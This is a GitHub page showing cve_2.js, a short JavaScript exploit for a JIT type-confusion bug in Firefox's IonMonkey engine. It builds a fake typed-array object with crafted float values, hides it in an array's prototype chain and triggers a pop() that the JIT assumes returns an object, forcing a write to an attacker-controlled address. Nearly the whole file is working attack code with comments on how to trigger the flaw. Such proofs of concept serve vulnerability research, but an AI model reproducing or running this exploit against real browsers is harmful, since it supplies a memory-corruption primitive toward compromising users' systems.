-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathcve_2.js
36 lines (29 loc) · 1002 Bytes
/
cve_2.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
// Run with --no-threads for increased reliability
let ab = new ArrayBuffer(0x1000);
let x = {buffer: ab, length: 13.39, byteOffset: 13.40, data: 1.1588927404741e-310};
//let x = {buffer: ab, length: 13.39, byteOffset: 13.40, data: 1.222269575596e-310};
let y = new Uint32Array(0x1000);
const v4 = [y, y, y, y, y];
function v7(v8,v9) {
//console.log("In Func.")
if (v4.length == 0) {
v4[3] = y;
}
// pop the last value. IonMonkey will, based on inferred types, conclude that the result
// will always be an object, which is untrue when p[0] is fetched here.
const v11 = v4.pop();
// It will then crash here when writing to a controlled address (0x168000000000).
v11[0] = 0x1337;
// Force JIT compilation.
for (let v15 = 0; v15 < 10000; v15++) {}
}
var p = {};
p.__proto__ = [y, y, y];
p[0] = x;
v4.__proto__ = p;
console.log("Starting Exploit.")
// previously 1000
for (let v31 = 0; v31 < 1000; v31++) {
v7();
}
console.log("Ending Exploit.")